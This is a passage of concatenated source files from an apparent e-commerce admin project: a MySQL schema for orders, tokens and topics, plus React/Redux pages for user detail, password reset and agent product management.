CREATE TABLE `t_oauth_refresh_token` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`created_time` datetime DEFAULT NULL,
`modified_time` datetime DEFAULT NULL,
`account_id` bigint(20) unsigned DEFAULT NULL,
`client_id` varchar(45) DEFAULT NULL,
`refresh_token` varchar(45) DEFAULT NULL,
`expires_in` datetime DEFAULT NULL,
`authentication` text,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*Table structure for table `t_order` */
DROP TABLE IF EXISTS `t_order`;
CREATE TABLE `t_order` (
`id` varchar(32) NOT NULL COMMENT '主键',
`account_id` bigint(32) DEFAULT NULL COMMENT '用户ID',
`type` varchar(64) DEFAULT 'Normal' COMMENT '订单类型:Normal 正常',
`status` varchar(32) DEFAULT NULL COMMENT '订单状态:WaitForPay 0-待支付,WaitForDeliver 1-待发货,Shipped 2-已发货,Finished 3-已完成,Cancled 4-已取消',
`delivery_address` varchar(1024) DEFAULT NULL COMMENT '收货地址、 json 格式',
`express_company_name` varchar(75) DEFAULT NULL COMMENT '快递公司',
`express_tracking_no` varchar(64) DEFAULT NULL COMMENT '快递单号',
`payment_method` varchar(32) DEFAULT NULL COMMENT '支付方式:0-在线支付, 1-货到付款,2-公司转账',
`payment_channel` varchar(32) DEFAULT NULL COMMENT '支付渠道:0-微信Wechat, 1-支付宝,Alipay,2-银联',
`payment_no` varchar(32) DEFAULT NULL COMMENT '订单支付单号:第三方支付流水号',
`payment_status` varchar(32) DEFAULT NULL COMMENT '支付状态:0-支付成功,1-支付失败',
`order_amount_payable` float(10,2) DEFAULT null COMMENT '订单应付金额',
`order_amount_payment` float(10,2) DEFAULT NULL COMMENT '订单实付金额',
`rebate_total` float(10,2) DEFAULT NULL COMMENT '返点金额',
`rebate_status` varchar(2) DEFAULT NULL COMMENT '是否返点,0-是,1-否',
`agent_id` bigint(32) DEFAULT NULL COMMENT '代理商ID',
`note` varchar(512) DEFAULT NULL COMMENT '买家留言',
`pay_time` datetime DEFAULT NULL COMMENT '支付时间',
`delivery_method` varchar(32) DEFAULT NULL COMMENT '配送方式:0-快递配送, 1-上门自提',
`shipping_time` datetime DEFAULT NULL COMMENT '发货时间',
`received_time` datetime DEFAULT NULL COMMENT '收货时间',
`created_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='订单主表';
/*Table structure for table `t_order_product` */
DROP TABLE IF EXISTS `t_order_product`;
CREATE TABLE `t_order_product` (
`id` bigint(32) NOT NULL AUTO_INCREMENT,
`order_id` bigint(32) DEFAULT NULL COMMENT '订单ID',
`product_id` bigint(32) DEFAULT NULL COMMENT '产品ID',
`quantity` float(10,3) DEFAULT NULL COMMENT '数量',
`unit` varchar(20) DEFAULT NULL COMMENT '单位',
`price` double(10,2) DEFAULT NULL COMMENT '价格',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='订单产品关联表';
/*Table structure for table `t_sky_light` */
DROP TABLE IF EXISTS `t_sky_light`;
CREATE TABLE `t_sky_light` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`sky_id` varchar(50) NOT NULL COMMENT '天窗ID',
`sky_type` varchar(15) NOT NULL COMMENT '天窗类型:Banner',
`sky_content` text COMMENT '天窗内容',
`sky_title` varchar(25) DEFAULT NULL COMMENT '天窗标题',
`description` varchar(120) DEFAULT NULL COMMENT '描述',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='天窗(轮播图)';
/*Table structure for table `t_topic` */
DROP TABLE IF EXISTS `t_topic`;
CREATE TABLE `t_topic` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT 'ID',
`title` varchar(120) DEFAULT NULL COMMENT '标题',
`description` varchar(300) DEFAULT NULL COMMENT '描述',
`sort` bigint(20) DEFAULT '0' COMMENT '顺序',
`start_time` datetime DEFAULT NULL COMMENT '开始时间',
`end_time` datetime DEFAULT NULL COMMENT '结束时间',
`status` varchar(10) DEFAULT NULL COMMENT '状态',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='主题表';
/*Table structure for table `t_topic_product` */
DROP TABLE IF EXISTS `t_topic_product`;
CREATE TABLE `t_topic_product` (
`id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'ID',
`topic_id` bigint(20) DEFAULT NULL COMMENT 'topicID',
`product_id` bigint(20) DEFAULT NULL COMMENT '产品ID',
`sort` bigint(20) DEFAULT NULL COMMENT '产品顺序',
`status` varchar(10) DEFAULT NULL COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='主题产品关联表';
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Table, message } from 'antd';
import { formatDateSecond } from '../../utils/utils';
import EnhanceTitle from '../../component/EnhanceTitle';
import addressColumns from './columns/address';
import orderColumns from './columns/order';
import { getUserById, getUserAddressById, getUserOrderById } from '../../action/user';
import { deleteOrderById } from '../../action/order';
import './index.css';
// Page component: USER detail view — profile card, shipping address table and
// order-history table for the user identified by the :id route param.
// NOTE(review): the class is named OrderDetail but renders the user detail
// page — looks like a copy/paste leftover; only the default export is
// consumed, so renaming would be safe.
@connect(({ user }) => ({
userDetail: user.userDetail,
userAddress: user.userAddress,
userOrderList: user.userOrderList
}), {
getUserById,
getUserAddressById,
getUserOrderById,
})
export default class OrderDetail extends React.PureComponent {
constructor(props) {
super(props);
// Order-history columns = shared order columns plus a per-row delete action.
this.orderColumns = [
...orderColumns,
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
render: (text, record) => <a onClick={() => this.deleteUserOrderById(record.id)} href="javascript:;">删除</a>
},
];
}
// Load profile, address and order list for the user in the route params.
componentDidMount() {
const { match: { params } } = this.props;
this.props.getUserById(params.id);
this.props.getUserAddressById(params.id);
this.props.getUserOrderById({ accountId: params.id });
}
// Delete one order, then reload the order list on success.
// NOTE(review): failures are silent — consider adding an error message branch.
deleteUserOrderById = async (id) => {
const result = await deleteOrderById(id);
if (result && result.code === 0) {
message.success(`删除${id}订单成功`);
const { match: { params } } = this.props;
this.props.getUserOrderById({ accountId: params.id });
}
}
render() {
const { userDetail = {}, userAddress = {}, userOrderList = {} } = this.props;
// The address table expects an array; wrap the single address and tag it so
// it can serve as the table rowKey.
const userAddressArr = [{ ...userAddress, name: userDetail.name, tag: 'address' }];
return (
<div className="page-detail">
<Card bordered={false}>
<EnhanceTitle title="用户详情" />
<div className="userinfo-box">
<div className="userinfo-left">
<img alt="用户头像" src={userDetail.url} />
<p>{userDetail.phoneNumber}</p>
</div>
<div className="userinfo-right">
<div className="userinfo-right1">
<p><span>用户ID</span><span>{userDetail.id}</span></p>
<p><span>姓名</span><span>{userDetail.name}</span></p>
<p><span>性别</span><span>TODO</span></p>
</div>
<div className="userinfo-right2">
<p><span>手机号</span><span>{userDetail.phoneNumber}</span></p>
<p><span>用户来源</span><span>{userDetail.registChannel}</span></p>
<p><span>注册时间</span><span>{formatDateSecond(userDetail.createTime)}</span></p>
</div>
</div>
</div>
</Card>
<Card bordered={false}>
<EnhanceTitle title="收货地址" />
<Table rowKey="tag" bordered columns={addressColumns} dataSource={userAddressArr} pagination={false} />
</Card>
<Card bordered={false}>
<EnhanceTitle title="订单记录" />
<Table rowKey="id" bordered columns={this.orderColumns} dataSource={userOrderList.records} />
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Form, Icon, Input, Button, message } from 'antd';
import { postResetAdminInfo } from '../../action/auth';
import './index.css';
const FormItem = Form.Item;
const formReset = {
labelCol: {
xs: { span: 24 },
sm: { span: 6 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 16 },
},
};
// Page component: reset the logged-in admin's password. Pre-fills username
// and phone from the current session (auth.userInfo.sysUser) and, on a
// successful reset, redirects to the login page.
@connect(({ auth }) => ({
userInfo: auth.userInfo,
}), {
postResetAdminInfo
})
@Form.create()
export default class NormalLoginForm extends React.Component {
// Validate the form, merge the values over the current sysUser record and
// submit; any truthy response is treated as success.
handleSubmit = (e) => {
e.preventDefault();
const { history, form } = this.props;
form.validateFields(async (err, values) => {
if (!err) {
const { userInfo = {} } = this.props;
const { sysUser = {} } = userInfo;
const resp = await this.props.postResetAdminInfo({
...sysUser,
...values,
});
if (resp) {
message.success('重置密码成功,将跳转登录页面');
history.push('/login');
}
}
});
}
render() {
const { getFieldDecorator } = this.props.form;
const { userInfo = {} } = this.props;
const { sysUser = {} } = userInfo;
return (
<div className="reset-page">
<h4>重置密码</h4>
<Form onSubmit={this.handleSubmit} className="reset-form">
<FormItem {...formReset} label="用户名">
{getFieldDecorator('username', {
initialValue: sysUser.username,
rules: [{ required: true, message: '请输入用户名' }],
})(
<Input placeholder="请输入用户名" />
)}
</FormItem>
<FormItem {...formReset} label="手机号">
{getFieldDecorator('phone', {
initialValue: sysUser.phone,
rules: [{ required: true, message: '请输入手机号' }],
})(
<Input placeholder="请输入手机号" />
)}
</FormItem>
<FormItem {...formReset} label="旧密码">
{getFieldDecorator('password', {
rules: [{ required: true, message: '请输入旧密码' }],
})(
<Input type="password" placeholder="请输入旧密码" />
)}
</FormItem>
<FormItem {...formReset} label="新密码">
{getFieldDecorator('newpassword1', {
rules: [{ required: true, message: '请输入新密码' }],
})(
<Input type="password" placeholder="请输入新密码" />
)}
</FormItem>
<FormItem {...formReset} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit" className="page-form-button">重置密码</Button>
</FormItem>
</Form>
</div>
);
}
}
<file_sep>import API from '../utils/api';
import { get, put, post } from '../utils/request';
// Redux action-type constants for the user module; consumed by the reducer
// in reducer/user and dispatched by the thunks below.
export const USER_LOGIN = 'USER_LOGIN';
export const GET_USER_LIST = 'GET_USER_LIST';
export const GET_USER_BYID = 'GET_USER_BYID';
export const GET_USER_ADDRESS_BYID = 'GET_USER_ADDRESS_BYID';
export const GET_USER_ORDER_BYID = 'GET_USER_ORDER_BYID';
export const GET_USER_LOGIN_LOGS = 'GET_USER_LOGIN_LOGS';
// Thunk: fetch a paged user list and publish it to the store on HTTP 200.
// NOTE(review): the name contains a typo ("Usert") but is part of this
// module's public API, so it is kept unchanged.
export function getUsertList(params) {
  return async (dispatch) => {
    const resp = await get(API.userList, params);
    if (!resp || resp.status !== 200) {
      return;
    }
    dispatch({ type: GET_USER_LIST, data: resp.data });
  };
}
// Thunk: load one user's profile by id and store it as userDetail.
export function getUserById(id) {
  return async (dispatch) => {
    const resp = await get(`${API.getUserById}/${id}`);
    if (!resp || resp.status !== 200) {
      return;
    }
    // Response body wraps the payload: axios `.data`, then body `.data`.
    dispatch({ type: GET_USER_BYID, data: resp.data.data });
  };
}
// Thunk: load one user's shipping address by user id.
export function getUserAddressById(id) {
  return async (dispatch) => {
    const resp = await get(`${API.getUserAddressById}/${id}`);
    if (!resp || resp.status !== 200) {
      return;
    }
    // Same double-wrapped payload shape as getUserById.
    dispatch({ type: GET_USER_ADDRESS_BYID, data: resp.data.data });
  };
}
// Thunk: fetch the order list for a user (params include accountId).
// Fix: the dispatch parameter was misspelled "dispath"; renamed for clarity
// (local name only — no behavior change).
// NOTE(review): unlike getUserById/getUserAddressById this dispatches
// result.data (not result.data.data); presumed intentional — confirm against
// the API's list-endpoint response shape.
export function getUserOrderById(params) {
  return async (dispatch) => {
    const result = await get(API.getUserOrderById, params);
    if (result && result.status === 200) {
      dispatch({
        type: GET_USER_ORDER_BYID,
        data: result.data
      })
    }
  }
}
// PUT an updated user record; resolves with the response body on HTTP 200,
// otherwise resolves with undefined.
export async function updateUser(params) {
  const resp = await put(API.updateUser, params);
  return resp && resp.status === 200 ? resp.data : undefined;
}
// POST a user upgrade request; resolves with the response body on HTTP 200,
// otherwise resolves with undefined.
export async function upgradeUser(params) {
  const resp = await post(API.upgradeUser, params);
  return resp && resp.status === 200 ? resp.data : undefined;
}
// Thunk: fetch paged user login logs and publish them on HTTP 200.
export function getUserLoginList(params) {
  return async (dispatch) => {
    const resp = await get(API.getUserLoginList, params);
    if (!resp || resp.status !== 200) {
      return;
    }
    dispatch({ type: GET_USER_LOGIN_LOGS, data: resp.data });
  };
}
<file_sep>import React from 'react';
import { Row, Col } from 'antd';
import './index.css';
class Description extends React.PureComponent {
static defaultProps = {
term: ''
}
render() {
const { term, children, ...restProps } = this.props;
return (
<Col {...restProps}>
<p className="description-content">
<span>{term}:</span>
<strong>{children}</strong>
</p>
</Col>
)
}
}
class DescriptionList extends React.PureComponent {
static defaultProps = {
col: 2,
}
render() {
const { col, children } = this.props;
const span = col ? 24 / col : 12;
return (
<div className="description-list">
<Row>
{React.Children.map(children, child => React.cloneElement(child, { span }))}
</Row>
</div>
)
}
}
DescriptionList.Description = Description;
export default DescriptionList;
<file_sep>import moment from 'moment';
// Render a date-like value (anything moment accepts) as 'YYYY-MM-DD'.
export function formatDate(date) {
  const wrapped = moment(date);
  return wrapped.format('YYYY-MM-DD');
}
// Render a date-like value as 'YYYY-MM-DD HH:mm' (minute precision).
export function formatDateMinute(date) {
  const wrapped = moment(date);
  return wrapped.format('YYYY-MM-DD HH:mm');
}
// Render a date-like value as 'YYYY-MM-DD HH:mm:ss' (second precision).
export function formatDateSecond(date) {
  const wrapped = moment(date);
  return wrapped.format('YYYY-MM-DD HH:mm:ss');
}
// Convert an integer amount in fen (1/100 yuan) to a yuan string with two
// decimals and thousands separators, e.g. 123456 -> '1,234.56'.
export function formatYuan(money = 0) {
  const asYuan = (money / 100).toFixed(2);
  // Insert a comma before every group of three digits that ends at a
  // non-digit boundary (i.e. only in the integer part, given 2 decimals).
  const grouped = asYuan.replace(/(\d)(?=(\d{3})+(?!\d))/g, '$1,');
  return grouped;
}
// Round a number to the nearest integer using Number.prototype.toFixed(0)
// semantics (matches the original implementation exactly).
export function fixedNumber(num = 0) {
  const rounded = num.toFixed(0);
  return Number(rounded);
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Steps, Icon, Table, Button, message, Popconfirm } from 'antd';
import { getOrderById, updateOrder } from '../../action/order';
import EnhanceTitle from '../../component/EnhanceTitle';
import DescriptionList from '../../component/DescriptionList';
import productColumns from './columns/product';
import operatorColumns from './columns/operator';
import { formatDateSecond } from '../../utils/utils';
import { ORDER_STATUS, PAYMENT_METHOD } from '../../utils/constant';
import { ORDER_TYPE, PAYMENT_CHANNEL } from '../../utils/constant';
import './index.css';
const { Step } = Steps;
const { Description } = DescriptionList;
@connect(({ order }) => ({
orderDetail: order.orderDetail
}), {
getOrderById
})
export default class OrderDetail extends React.PureComponent {
componentDidMount() {
const { match: { params } } = this.props;
const id = params.id;
this.props.getOrderById(id);
}
cancelOrder = async () => {
const { match: { params } } = this.props;
const id = params.id;
const { orderDetail = {} } = this.props;
const account = orderDetail.account ? orderDetail.account: {};
const result = await updateOrder({
id,
accountId: account.id,
status: 4,
});
if (result && result.code === 0) {
this.setState({
visible: false,
});
message.success('取消订单成功');
} else {
message.error('取消订单失败,请稍后重试');
}
}
render() {
const { orderDetail = {} } = this.props;
const { productList = [] } = orderDetail;
const account = orderDetail.account ? orderDetail.account: {};
const address = orderDetail.address ? orderDetail.address : {};
return (
<div className="page-detail">
<Card bordered={false}>
<EnhanceTitle title="订单状态流" />
<Steps current={Number(orderDetail.status) + 1}>
<Step title="提交订单" description={formatDateSecond(orderDetail.createdTime)}/>
<Step title="支付订单" description={ORDER_STATUS[orderDetail.status] || '未支付'} />
<Step title="平台发货" description="" />
<Step title="确认收货" description="" />
<Step title="完成订单" description="" />
</Steps>
</Card>
<div className="order-status">
<div style={{ color: '#f5222d' }}>
<Icon style={{ marginRight: 5 }} type="exclamation-circle" theme="outlined" />
当前订单状态:{ORDER_STATUS[orderDetail.status] || '未支付'}
</div>
{orderDetail.status !== '4' && (
<div>
<Popconfirm
placement="topRight"
title="你确定关闭此订单吗"
onConfirm={this.cancelOrder}
okText="确定"
cancelText="取消"
>
<Button style={{ marginRight: '20px' }} type="danger">关闭订单</Button>
</Popconfirm>
</div>
)}
</div>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<DescriptionList>
<Description term="订单编号">{orderDetail.id}</Description>
<Description term="订单金额">{orderDetail.orderAmountPayable / 100}(元)</Description>
<Description term="用户账号">{account.phoneNumber}</Description>
<Description term="支付方式">{PAYMENT_METHOD[orderDetail.paymentMethod]}</Description>
<Description term="支付渠道">{PAYMENT_CHANNEL[orderDetail.paymentChannel]}</Description>
<Description term="订单类型">{ORDER_TYPE[orderDetail.type]}</Description>
</DescriptionList>
</Card>
<Card bordered={false}>
<EnhanceTitle title="收货人信息" />
<DescriptionList>
<Description term="收货人">{address.consigneeName}</Description>
<Description term="手机号码">{address.phoneNumber}</Description>
{/* <Description term="邮政编码">{consigneeName}</Description> */}
<Description term="收货地址">{address.fullAddress}</Description>
</DescriptionList>
</Card>
<Card bordered={false}>
<EnhanceTitle title="产品信息" />
<Table rowKey="id" bordered columns={productColumns} dataSource={productList} pagination={false} />
</Card>
<Card bordered={false}>
<EnhanceTitle title="操作人信息" />
<Table bordered columns={operatorColumns} dataSource={[orderDetail]} />
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import qs from 'qs';
import ReactToPrint from "react-to-print";
import { Card, Form, Row, Col, Input, Select, Table, Button, Divider, message, Popconfirm, Modal } from 'antd';
import { getProductCode, getProductList } from '../../action/product';
import { getProductTypes } from '../../action/productType';
import { deleteAgentProduct } from '../../action/agent';
import { getSystemDicts } from '../../action/system';
import { formatDateSecond, formatYuan } from '../../utils/utils';
import { formItemLayout, showTotal, nullString, PRODUCT_STATUS, UNIT_VALUES } from '../../utils/constant';
import ProductModal from './ProductModal';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
// Page component: manage the products associated with one agent (route :id).
// Supports searching, bulk de-association, associating new products via a
// modal, and printing product QR codes with react-to-print.
// NOTE(review): the success/error texts in agentProduct/agentProductSingle
// say "关联代理商成功/失败" although both call deleteAgentProduct (they REMOVE
// the association) — confirm the intended wording.
@connect(({ product }) => ({
productList: product.productList,
}), {
getProductList,
})
@Form.create()
export default class AgentProduct extends React.PureComponent {
constructor(props) {
super(props);
// Table column definitions; built once so render() does not rebuild them.
this.columns = [
{
title: '产品名称',
dataIndex: 'name',
key: 'name',
align: 'center',
fixed: 'left',
},
{
title: '产品货号',
dataIndex: 'sameStyleNum',
key: 'sameStyleNum',
align: 'center',
},
{
// Maps the category label to its human-readable description from the
// dictionaries loaded in componentDidMount.
title: '产品大类',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
render: (text) => {
const { productCategory = [] } = this.state;
const info = productCategory.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品子类',
dataIndex: 'productSubcategory',
key: 'productSubcategory',
align: 'center',
render: (text) => {
const info = this.state.dictLevel4.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品图片',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
// Price is taken from the first entry of priceList (stored in fen;
// formatYuan converts to yuan).
title: '价格(元)',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return product.price !== undefined ? formatYuan(product['price']) : nullString
}
},
{
title: '计价单位',
dataIndex: 'unit',
key: 'unit',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return UNIT_VALUES[product['unit']] || nullString
}
},
{
title: '颜色',
dataIndex: 'colour',
key: 'colour',
align: 'center',
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
width: '10%',
render: (text) => text ? formatDateSecond(text) : nullString
},
{
title: '状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => text ? PRODUCT_STATUS[text] : '待上架'
},
{
// Row actions: de-associate the product from this agent, or print its
// QR code.
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
render: (text, record) => {
return (
<div>
<Popconfirm
placement="topLeft"
title={`请确定是否取消关联该产品?`}
onConfirm={() => this.agentProductSingle(record)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">取消</a>
</Popconfirm>
<Divider type="vertical" />
<a onClick={() => this.printProduct(record)} href="javascript:;">打印</a>
</div>
)
}
},
];
}
state = {
pagination: {
showSizeChanger: true,
showQuickJumper: true,
},
// Row-selection bookkeeping: keys plus full row objects (rows are kept
// separately because antd only reports rows for the current page).
selectedRowKeys: [],
selectedRows: [],
loading: false,
// Print-modal visibility/loading.
visible: false,
confirmLoading: false,
// Products queued for printing and their fetched QR-code images.
printList: [],
codeList: [],
// Dictionary data for category/subcategory/colour rendering.
productCategory: [],
productSubcategory: [],
showProductModal: false,
dictLevel4: [],
colour: [],
};
async componentDidMount() {
this.getProductList();
const productCategory = getProductTypes({ parentLabel: 'productCategory' });
this.setState({ productCategory: await productCategory });
const dictLevel4 = getProductTypes({ level: 4 });
this.setState({ dictLevel4: await dictLevel4 });
const colour = getSystemDicts({ parentLabel: 'colour' });
this.setState({ colour: await colour });
}
componentWillUnmount() {
// NOTE(review): replacing setState with a no-op suppresses the
// "setState on unmounted component" warning but is an anti-pattern;
// prefer cancelling the in-flight requests instead.
this.setState = (state,callback) => { };
}
// Fetch the product list for this agent (exist: 1 restricts to products
// already associated), merging the search-form values into the query.
getProductList = async (params) => {
const { match } = this.props;
const { id } = match.params;
this.setState({ loading: true });
this.props.form.validateFields(async(err, values) => {
if (!err) {
await this.props.getProductList({ ...values, ...params, agentId: id, exist: 1, limit: 10 });
this.setState({ loading: false });
} else {
this.setState({ loading: false });
}
});
}
// When the top-level category changes, clear and reload the subcategory
// options for the search form.
handleCateChange = async (value) => {
this.props.form.setFieldsValue({ productSubcategory: [] });
if (value) {
const result = await getProductTypes({ parentLabel: value });
this.setState({ productSubcategory: result });
}
}
handleSubmit = (e) => {
e.preventDefault();
this.getProductList();
}
// Keep selectedRows in sync across pages: rows deselected on the current
// page are dropped; rows selected on other pages are retained by key.
onSelectChange = (selectedRowKeys, selectedRows) => {
const { selectedRows: productList } = this.state;
let newRows = [];
if (selectedRowKeys.length === selectedRows.length) {
newRows = [...selectedRows];
} else if (selectedRowKeys.length > selectedRows.length) {
const otherRowsKeys = selectedRowKeys.filter(item => selectedRows.every(row => row.id !== item));
const otherRows = productList.filter(item => otherRowsKeys.indexOf(item.id) !== -1);
newRows = otherRows.concat(selectedRows);
}
this.setState({ selectedRows: newRows, selectedRowKeys });
}
handleReset = () => {
this.props.form.resetFields();
}
// Track pagination locally and re-query with the new page/size.
handleTableChange = (pagination) => {
const pager = { ...this.state.pagination };
pager.current = pagination.current;
pager.pageSize = pagination.pageSize;
this.setState({ pagination: pager });
this.getProductList({
limit: pagination.pageSize,
page: pagination.current,
});
}
handleShowModal = () => {
this.setState({ showProductModal: true });
}
// Closing the associate-product modal refreshes the list to pick up any
// newly associated products.
handleCloseModal = () => {
this.setState({ showProductModal: false });
this.getProductList();
}
// Table header: bulk actions (print / de-associate / associate).
title = () => {
const { selectedRowKeys, selectedRows } = this.state;
return (
<div>
<span>操作处理:</span>
<Button disabled={!selectedRowKeys.length} onClick={this.printProduct} type="primary">批量打印</Button>
<Divider type="vertical" />
<Button disabled={!selectedRowKeys.length} onClick={() => this.agentProduct(0)} type="primary">取消关联</Button>
<Divider type="vertical" />
<Button onClick={this.handleShowModal} type="primary">关联产品</Button>
</div>
)
}
// Bulk de-associate the selected products from this agent.
// NOTE(review): the `sign` argument is never used, and the success/error
// texts describe association rather than de-association — confirm.
agentProduct = async(sign) => {
const agentId = this.props.match.params.id;
const { selectedRowKeys, selectedRows } = this.state;
const values = selectedRowKeys.map(item => item);
const result = await deleteAgentProduct(agentId, values);
if (result && result.code === 0) {
message.success(`产品名称为${selectedRows.map(item => item.name).join('、')}关联代理商成功`);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('批量关联代理商失败,请稍后重试');
}
}
// De-associate a single product (row action), then refresh the list.
agentProductSingle = async (record) => {
const agentId = this.props.match.params.id;
const result = await deleteAgentProduct(agentId, [record.id]);
if (result && result.code === 0) {
message.success(`产品名称为${record.name}关联代理商成功`);
const pager = { ...this.state.pagination };
this.getProductList({
limit: pager.pageSize,
page: pager.current,
});
this.setState({ selectedRowKeys: [] });
} else {
message.error('代理商关联此产品失败,请稍后重试');
}
}
showModal = () => {
this.setState({
visible: true,
});
}
handleOk = () => {
this.setState({
confirmLoading: true,
});
}
handleCancel = () => {
this.setState({
visible: false,
});
}
// Fetch QR code(s) and open the print modal. Called either with a single
// row (row action) or with a click event from the bulk button, in which
// case record.id is absent and the current selection is printed.
printProduct = async (record) => {
const { sn } = qs.parse(this.props.location.search.substr(1));
if (record.id) {
const result = await getProductCode(record.id, sn);
const code = result.data || '';
this.setState({ printList: [record], codeList: [code] }, () => {
this.showModal();
});
} else {
const { selectedRows, selectedRowKeys } = this.state;
const promises = selectedRowKeys.map((id) => getProductCode(id, sn));
const results = await Promise.all(promises);
const codeList = results.map(item => item ? item.data: '');
this.setState({ printList: selectedRows, codeList }, () => {
this.showModal();
});
}
}
render() {
const { form: { getFieldDecorator }, productList = {} } = this.props;
const { selectedRowKeys, loading, visible, confirmLoading, printList, codeList, productCategory = [], productSubcategory, showProductModal } = this.state;
const rowSelection = { selectedRowKeys, onChange: this.onSelectChange };
const agentId = this.props.match.params.id;
return (
<div className="page-list product-list">
<ProductModal agentId={agentId} showProductModal={showProductModal} handleCloseModal={this.handleCloseModal}/>
<Card bordered={false} className="form-container">
<Form onSubmit={this.handleSubmit}>
<Row gutter={12}>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品名称">
{getFieldDecorator('name')(
<Input placeholder="请输入产品名称" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品货号">
{getFieldDecorator('sameStyleNum')(
<Input placeholder="请输入产品货号" />
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品大类">
{getFieldDecorator('productCategory')(
<Select onChange={this.handleCateChange} allowClear placeholder="请选择产品大类">
{productCategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
</Col>
<Col xs={{ span: 24 }} sm={{ span: 12 }} lg={{ span: 6 }}>
<FormItem {...formItemLayout} label="产品子类">
{getFieldDecorator('productSubcategory')(
<Select allowClear placeholder="请选择产品子类">
{productSubcategory.map(item => (
<Option key={item.label} value={item.label}>{item.description}</Option>
))}
</Select>
)}
</FormItem>
</Col>
</Row>
<Row>
<Col xs={{ span: 8, push: 16 }} sm={{ span: 12, push: 12 }} lg={{ span: 8, push: 16 }} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit">搜索</Button>
<Button style={{ marginLeft: '8px', marginRight: '8px' }} onClick={this.handleReset}>清空</Button>
</Col>
</Row>
</Form>
</Card>
<Card bordered={false}>
<Table
title={this.title}
rowKey="id"
onChange={this.handleTableChange}
pagination={{ showTotal: showTotal, total: productList.total, ...this.state.pagination }}
rowSelection={rowSelection}
columns={this.columns}
dataSource={productList.records}
loading={loading}
/>
</Card>
<Modal title="产品二维码"
className="print-modal"
width="230mm"
visible={visible}
onOk={this.handleOk}
confirmLoading={confirmLoading}
onCancel={this.handleCancel}
style={{ padding: 0 }}
footer={null}
>
<div className="print-wrap" style={{ width: '230mm', padding: '6mm 0' }} ref={el => (this.componentRef = el)}>
<Row>
{printList.map((item, key) => (
<Col key={item.id} style={{ marginBottom: '10mm' }} span={selectedRowKeys.length > 1 ? 6 : 24}>
<img alt="二维码" src={codeList[key]} />
<img alt="产品图片" src={item.mainPicture} />
</Col>
))}
</Row>
</div>
<div style={{ textAlign: 'center' }}>
<Button onClick={this.handleCancel} style={{ marginRight: '20px' }}>取消</Button>
<ReactToPrint
trigger={() => <Button type="primary">打印</Button>}
content={() => this.componentRef}
/>
</div>
</Modal>
</div>
)
}
}
<file_sep>import { GET_USER_LIST, GET_USER_BYID, GET_USER_ADDRESS_BYID, GET_USER_ORDER_BYID, GET_USER_LOGIN_LOGS } from '../action/user';
// Initial state for the user slice of the store.
// Fix: userOrderList is written by GET_USER_ORDER_BYID but was missing from
// the initial state; added so consumers always see a consistent {} shape
// before the first load (matching the other keys).
const defaultState = {
